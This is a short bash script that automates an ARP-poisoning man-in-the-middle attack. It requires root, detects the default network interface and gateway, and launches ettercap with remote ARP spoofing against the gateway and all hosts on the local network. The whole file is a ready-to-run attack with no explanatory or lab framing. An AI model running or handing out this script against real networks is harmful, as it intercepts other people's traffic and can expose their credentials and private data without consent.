#!/usr/bin/env bash





  [[ $EUID -ne 0  ]] &&  { echo "[!] run this script while root"; exit 1; } 
  command -v ettercap >/dev/null || { echo "[!] ettercap not found"; exit 1; }
  command -v ip >/dev/null || { echo "[!] ip is not installed";  exit 1; }
  INTERFACE=$(ip -4 route show default | awk '{print $5}')
  IP=$(ip route show | grep -i 'default via'| awk '{print $3 }')
  ettercap -T -S -i "$INTERFACE" -M arp:remote /"$IP"// 
